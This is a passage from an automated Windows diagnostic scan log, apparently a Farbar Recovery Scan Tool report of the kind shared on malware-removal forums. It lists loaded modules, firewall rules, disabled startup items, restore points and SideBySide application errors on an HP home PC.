2009-07-01 18:44 - 2009-07-01 18:44 - 00632888 _____ () C:\Program Files (x86)\Hewlett-Packard\Shared\hpqToaster.exe
2010-06-30 01:12 - 2010-06-30 01:12 - 00061440 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\PCAlerts\PCAlertsPillar.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00131072 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\ECenter\ECLibrary.dll
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumdx32.dll
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumd32.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00040960 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingServer.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00005632 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingInterface.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00018944 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingMessages.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00036864 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingClients.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00007680 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\RemotingClient.dll
2010-06-30 01:12 - 2010-06-30 01:12 - 00028672 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Microsoft.Practices.EnterpriseLibrary.ExceptionHandling.Logging.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCP71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCR71.dll
2009-07-23 14:37 - 2009-07-23 14:37 - 00931112 ____N () c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMediaLibrary.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71.DLL
2009-07-24 21:24 - 2009-07-24 21:24 - 00124288 ____N () c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CLSchMgr.dll
2009-07-24 21:24 - 2009-07-24 21:24 - 00275848 ____N () c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CLCapEngine.dll
2009-07-24 21:24 - 2009-07-24 21:24 - 00349480 ____N () c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CLTinyDB.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71U.DLL
2015-06-03 13:44 - 2015-06-03 13:44 - 00315648 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\dblite.dll
2009-11-19 10:20 - 2009-11-19 10:20 - 02121728 _____ () C:\Program Files (x86)\Common Files\LightScribe\QtCore4.dll
2009-11-19 10:20 - 2009-11-19 10:20 - 07745536 _____ () C:\Program Files (x86)\Common Files\LightScribe\QtGui4.dll
2009-11-19 10:20 - 2009-11-19 10:20 - 00135168 _____ () C:\Program Files (x86)\Common Files\LightScribe\plugins\imageformats\qjpeg4.dll
2016-08-23 19:23 - 2017-02-26 13:58 - 08929984 _____ () C:\Program Files (x86)\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2016-08-23 19:23 - 2017-02-26 13:58 - 08929984 _____ () C:\Program Files (x86)\Microsoft Office\Root\Office16\1033\GrooveIntlResource.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\sharepoint.com -> hxxps://geisinger-files.sharepoint.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2012-08-15 20:16 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 204.186.80.229 - 204.186.110.114
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^KEKLR^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: msnmsgr => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
MSCONFIG\startupreg: NortonOnlineBackupReminder => "C:\Program Files (x86)\Symantec\Norton Online Backup\Activation\NobuActivation.exe" UNATTENDED
MSCONFIG\startupreg: ooVoo.exe => C:\Program Files (x86)\ooVoo\oovoo.exe /minimized
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{E1D7F83E-8125-4845-90A7-673ADEF33553}] => (Allow) svchost.exe
FirewallRules: [{B3229E98-0217-4660-8DE6-F3FAB7DC660B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector\PDR.EXE
FirewallRules: [{25561CBD-ECD5-4B2A-A6B7-AAC23815F36E}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartMusic.exe
FirewallRules: [{DFFCBF30-C5DF-4898-8A74-672CBD634E93}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartPhoto.exe
FirewallRules: [{1A8F384C-D5FB-424C-864F-DFBDD7097751}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPTouchSmartVideo.exe
FirewallRules: [{25AD11FD-9A9F-4400-AD7E-D1702D6879EC}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\TSMAgent.exe
FirewallRules: [{88F56785-A335-4A9E-A307-233FED433B1E}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\Kernel\CLML\CLMLSvc.exe
FirewallRules: [{0FA28E00-84B9-499D-BABD-0FF0CB52E7DA}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\DVD\HPDVDSmart.exe
FirewallRules: [{EA67C5FD-9887-4967-B124-B80BDD1D9572}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\HPTouchSmartMusic.exe
FirewallRules: [{C32D536B-BDF8-48A2-B50E-15F07DFB9F1A}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\HPTouchSmartPhoto.exe
FirewallRules: [{5AAFCC03-01D9-4D96-9427-3F2C6DE5154E}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\HPTouchSmartVideo.exe
FirewallRules: [{EA1F0951-8BA5-41CB-A72A-34307C6E1966}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\TSMAgent.exe
FirewallRules: [{98616B3D-0AAC-4C16-8ECE-981D41D17865}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
FirewallRules: [{D639F928-A1C7-4D0F-9135-C8527DF99989}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\QP.exe
FirewallRules: [{CD01A839-E293-40DF-A297-6D1E71CBF919}] => (Allow) c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\QPService.exe
FirewallRules: [{1159FAE0-AD6A-402E-BF7C-378981DE37CE}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{4216947E-E48E-4D68-832C-B84405FCA4FD}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{B1B24A7E-5C03-4B2E-BC74-F446D90241B1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{71E5C151-FC96-44B3-A2CA-A748564E2318}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{AE1DD8AE-DAA6-4E3A-A82E-0B84DD062818}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{2E3483C0-9134-4DEC-A8D6-FE74ABD65F6D}] => (Allow) C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [TCP Query User{9F515C7B-8CC7-4B76-8DF6-F904758E6FF6}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Allow) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [UDP Query User{8D839777-A6FB-47E8-B380-7AD82C5F564F}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Allow) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [TCP Query User{5A0D406D-2C29-4D0B-83D7-D26AF7FFE562}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Block) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [UDP Query User{A60AD26E-BC55-4B0C-BB47-6E4EF5036555}C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe] => (Block) C:\program files (x86)\ftp\ws_ftp\ws_ftp95.exe
FirewallRules: [{93464EED-A641-4CB5-8DC6-92BFDF7A1E14}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
FirewallRules: [{DC01FAA2-E761-4009-AD0C-43E643AD9B75}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
FirewallRules: [TCP Query User{303F326C-E8E1-4E8E-B813-F47FFD9F0723}C:\windows\system32\wfs.exe] => (Allow) C:\windows\system32\wfs.exe
FirewallRules: [UDP Query User{DCA3884F-EB76-4A60-A6B9-1DFF3FE0BBD0}C:\windows\system32\wfs.exe] => (Allow) C:\windows\system32\wfs.exe
FirewallRules: [{807B38CE-D94F-4932-B5B4-76AFD4EACD49}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{286E2E43-1C9B-4F06-B81D-1AC670CE9FB6}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [{60FE7295-6201-4657-999B-4EF247CE7B99}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgmfapx.exe
FirewallRules: [TCP Query User{1DE570DA-78EC-4184-A009-98FB9B493B34}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [UDP Query User{D887F8EE-A443-40B6-B7B5-600540129350}C:\program files (x86)\oovoo\oovoo.exe] => (Allow) C:\program files (x86)\oovoo\oovoo.exe
FirewallRules: [{5AB7D43E-8475-4578-A94A-1F2F90B7D6C0}] => (Allow) LPort=443
FirewallRules: [{B64ACE0E-B87F-4398-B1F3-852D19BE57F9}] => (Allow) LPort=443
FirewallRules: [{F6B20571-EB14-49D0-94C9-80FCB65ADCFF}] => (Allow) LPort=37674
FirewallRules: [{62D436F2-ADC2-4C86-96A8-B1F8CB9AC10F}] => (Allow) LPort=37674
FirewallRules: [{C3651C1F-C25C-4E6F-B502-3D5354C27B43}] => (Allow) LPort=37675
FirewallRules: [{0544294C-EA9B-402F-8605-23FF31F7AD74}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{9CED51D6-960B-413C-A290-F9C46BAA9D15}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgnsa.exe
FirewallRules: [{65EADB25-C00A-4DDC-A22F-5E81ACCB0EA9}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{A094DAF1-5D2E-4D12-8F1E-8FADDCD6C8FF}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgdiagex.exe
FirewallRules: [{DCE8C09D-7BD0-4FFC-B0DE-1BAAA0BF727B}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [{F2411DBE-A931-4B28-BDBC-0F63AE569E04}] => (Allow) C:\Program Files (x86)\AVG\AVG2012\avgemca.exe
FirewallRules: [TCP Query User{A4BC3617-A8AF-41F7-AEE3-B1AE7B986930}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [UDP Query User{6536AA84-BEB9-43E7-BD20-81F36A8A183E}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [TCP Query User{77151B81-74DA-46B2-B739-F1A0BFDE09EF}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Allow) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [UDP Query User{41503EB1-8543-4238-BC72-9C7F53E08CFC}C:\program files (x86)\mozilla firefox\plugin-container.exe] => (Allow) C:\program files (x86)\mozilla firefox\plugin-container.exe
FirewallRules: [{572FCD51-C732-4315-89C8-E6BADF60CB1F}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{099E1608-3E83-453C-A568-BB3965D87EA4}] => (Allow) LPort=2869
FirewallRules: [{54E040B6-7378-4097-BFDA-57CEB23FB0C2}] => (Allow) LPort=1900
FirewallRules: [{31C42B69-8BB5-4738-AE2A-5F21F0EAC60E}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [TCP Query User{D7ECE11A-14F4-47CD-8B60-C5D3AD970D7D}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [UDP Query User{B68C8F2B-1ACD-468A-A168-2FEADD06031B}C:\program files (x86)\microsoft office\office14\groove.exe] => (Block) C:\program files (x86)\microsoft office\office14\groove.exe
FirewallRules: [{7025A58C-00CD-4143-96DB-FA06A2ED5CC4}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1A452F1C-3A13-47C6-9924-6B9FE2FA2EE0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{ADE58B14-70C6-4153-91AC-3B0E36524493}] => (Allow) C:\Windows\SysWOW64\dlcccoms.exe
FirewallRules: [{7301EA4A-8CC4-4DE8-AECF-6DAECD8DF3A8}] => (Allow) C:\Windows\SysWOW64\dlcccoms.exe
FirewallRules: [{9FCC936F-1ECC-4FF9-831B-D494B20D60CB}] => (Allow) C:\Windows\System32\dlcccoms.exe
FirewallRules: [{EE85E7CE-EDE5-48AC-95A9-56633C10661C}] => (Allow) C:\Windows\System32\dlcccoms.exe
FirewallRules: [{50F741E4-BECA-4A15-9FB8-0C32E919209B}] => (Allow) C:\Windows\System32\spool\drivers\x64\3\dlccpswx.exe
FirewallRules: [{F8DB05C7-6658-4DBF-8235-A5838701AA01}] => (Allow) C:\Windows\System32\spool\drivers\x64\3\dlccpswx.exe
FirewallRules: [{FBBE89C6-499F-4202-99AB-543184772EBF}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccmon.exe
FirewallRules: [{FCDFFDF1-B40D-44DE-8327-3E803EEC7AA7}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccmon.exe
FirewallRules: [{ADB57472-D531-4A14-B8EC-5CF09B84E0D7}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccaiox.exe
FirewallRules: [{29BA85FB-5A48-4FAC-A9E5-EF97C797EBE1}] => (Allow) C:\Program Files (x86)\Dell Photo AIO Printer 924\dlccaiox.exe
FirewallRules: [{69C5F1E2-2BBF-4AC5-99AE-6EE52620C3BF}] => (Allow) C:\Users\KEKLR\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [{4F8121D3-305E-4B52-A980-511CF6637DA6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0969CE3F-AB75-4EDF-91BF-B24144E5BA03}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{64FD7F62-CA4F-4BC4-96FF-78AF71530077}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [TCP Query User{70E1C592-B5C7-4724-8604-76CC8BAD46A9}C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe] => (Allow) C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe
FirewallRules: [UDP Query User{CB9AB233-D91A-411D-BF56-A1B265C80959}C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe] => (Allow) C:\program files (x86)\hewlett-packard\hp support solutions\modules\hpdevicedetection3.exe
FirewallRules: [{167D5738-02EB-40A8-B8C3-0E4C0E60F425}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{6C278C1F-E02F-4F95-B22A-12C9D9CAFBE2}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPPSdr\HPDiagnosticCoreUI.exe
FirewallRules: [{E4E886C7-1D80-42F9-B576-B3BC4F70B32E}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{C30BB94F-9D99-4F73-A420-F14961B522E1}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{9E3958BA-AD48-45B7-B7F9-9CEFF14FE771}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [TCP Query User{59976019-56BF-4C07-8662-F6FA2CDDA46F}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
FirewallRules: [UDP Query User{563B2413-04C2-4711-817E-88F15DC9C6B4}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
FirewallRules: [{B81E0F49-BA90-4FF1-9A42-A74A41023898}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS1ADC\HPDiagnosticCoreUI.exe
FirewallRules: [{0647A174-0085-4BC0-9CA8-41C072C6371D}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS1ADC\HPDiagnosticCoreUI.exe
FirewallRules: [{D8133625-8DFD-427B-9111-3D14776DFE7A}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS744B\HPDiagnosticCoreUI.exe
FirewallRules: [{8E3EA3F7-663E-4722-852F-74C24267D0B0}] => (Allow) C:\Users\KEKLR\AppData\Local\Temp\7zS744B\HPDiagnosticCoreUI.exe
FirewallRules: [{84AECAC3-5692-4F37-B037-77FBE65C0467}] => (Allow) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
FirewallRules: [{3F971EA5-E550-44CC-BBD1-93F058891F2C}] => (Allow) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
FirewallRules: [TCP Query User{362CB37B-AAA1-45EF-A332-40E197A57F28}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Allow) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [UDP Query User{717A6F34-710F-48AF-996D-EE1FFC536B8B}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Allow) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [{62A8F062-EB0C-4869-8EC9-5517C0C12356}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{9258237D-3CBE-457D-8BC3-B2B68083BB2D}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{54F78F36-2594-42A1-B051-D6E5ADE67F9C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{2F9785B8-F539-48A6-BA58-64C1FBF652D3}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{13573266-BCD3-483A-A735-153867261B87}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{C6B475F1-8916-4E39-9711-A5D018D1F5F7}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{FDED0C5D-B2C0-41D1-A5B1-410036D5E616}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{37C5CB39-992C-4F99-90F0-F2718E8518BA}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{D0DC0116-BF41-4FA5-98EE-EF32ECA5DF10}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [TCP Query User{F1F23913-8C7D-4B13-8D5A-52CC3B81421D}C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe] => (Allow) C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe
FirewallRules: [UDP Query User{7297ADDE-FFEE-4429-8DAD-7A733755025B}C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe] => (Allow) C:\program files (x86)\trend micro\drscanner\nmap\nmap.exe
FirewallRules: [{9D2427F4-C33D-4E14-9231-9FFB1BBC1103}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{B9D14B95-5465-4B94-9856-C19342AF6B05}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{2E258567-5593-43F5-A73C-78A7678C2B39}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{E0DF924F-D6D4-4654-A974-39E33E8AD879}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{35A11117-24D7-4D6D-B9E2-0B15FB659EE3}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{D752A735-DAF5-4D93-B15B-27B28773A8AD}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{32A83C1F-89D4-4CBE-86D7-E8951ACF4700}] => (Allow) C:\Program Files (x86)\Trend Micro\DRScanner\sdk\TmDrMon.exe
FirewallRules: [{8045D3CF-65FE-46B4-B636-F5BF369728D9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{F283683E-A7E1-4A6D-8520-E295EFEF38C2}C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe] => (Allow) C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe
FirewallRules: [UDP Query User{607FE590-DF2E-479C-9421-F45292DFA0A9}C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe] => (Allow) C:\users\keklr\appdata\local\temp\housecall\tmase\nmap\bonjour.exe
FirewallRules: [{2AB6E6B9-4C5B-49D9-864E-2BA0C900C86E}] => (Allow) C:\Windows\Temp\DRSUnzipTemp\sdk\TmDrMon.exe
FirewallRules: [{E1E69D41-EA01-49BA-9769-D2C8FA30C630}] => (Allow) C:\Windows\Temp\DRSUnzipTemp\sdk\TmDrMon.exe
FirewallRules: [{2239062F-51E6-476E-B7F6-F5A9FE1F0608}] => (Allow) C:\Windows\Temp\DRSUnzipTemp\sdk\TmDrMon.exe

==================== Restore Points =========================

08-03-2017 07:18:12 Windows Update
11-03-2017 13:32:40 Windows Update
14-03-2017 13:50:43 Removed Adobe Acrobat Reader DC.
15-03-2017 19:38:37 Windows Update
17-03-2017 06:21:32 Windows Update
23-03-2017 17:47:02 Windows Update
30-03-2017 19:34:54 Windows Update
01-04-2017 07:21:37 Windows Update
05-04-2017 04:42:14 Windows Update
08-04-2017 08:47:30 Windows Update

==================== Faulty Device Manager Devices =============

Name: HP Integrated Module with Bluetooth 2.0 Wireless Technology
Description: HP Integrated Module with Bluetooth 2.0 Wireless Technology
Class Guid: {e0cbf06c-cd8b-4647-bb8a-263b43f0f974}
Manufacturer: Broadcom
Service: BTHUSB
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:
==================
Error: (04/08/2017 10:41:24 AM) (Source: SideBySide) (EventID: 63) (User: )
Description: Activation context generation failed for "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll".Error in manifest or policy file "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll" on line 3.
The value "MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR" of attribute "version" in element "assemblyIdentity" is invalid.

Error: (04/08/2017 10:33:49 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "c:\program files (x86)\eset\eset online scanner\ESETSmartInstaller.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (04/08/2017 09:03:16 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/08/2017 08:43:01 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (04/05/2017 05:00:03 AM) (Source: SideBySide) (EventID: 63) (User: )
Description: Activation context generation failed for "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll".Error in manifest or policy file "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll" on line 3.
The value "MAJOR_VERSION.MINOR_VERSION.BUILD_NUMBER_MAJOR.BUILD_NUMBER_MINOR" of attribute "version" in element "assemblyIdentity" is invalid.

Error: (04/05/2017 04:58:26 AM) (Source: SideBySide) (EventID: 80) (User: )
Description: Activation context generation failed for "c:\program files (x86)\eset\eset online scanner\ESETSmartInstaller.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (04/05/2017 04:56:43 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/04/2017 06:27:38 PM) (Source: SideBySide) (EventID: 63) (User: )
Description: Activation context generation failed for "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll".Error in manifest or policy file "c:\program files (x86)\common files\adobe air\versions\1.0\Adobe AIR.dll" on line 3.
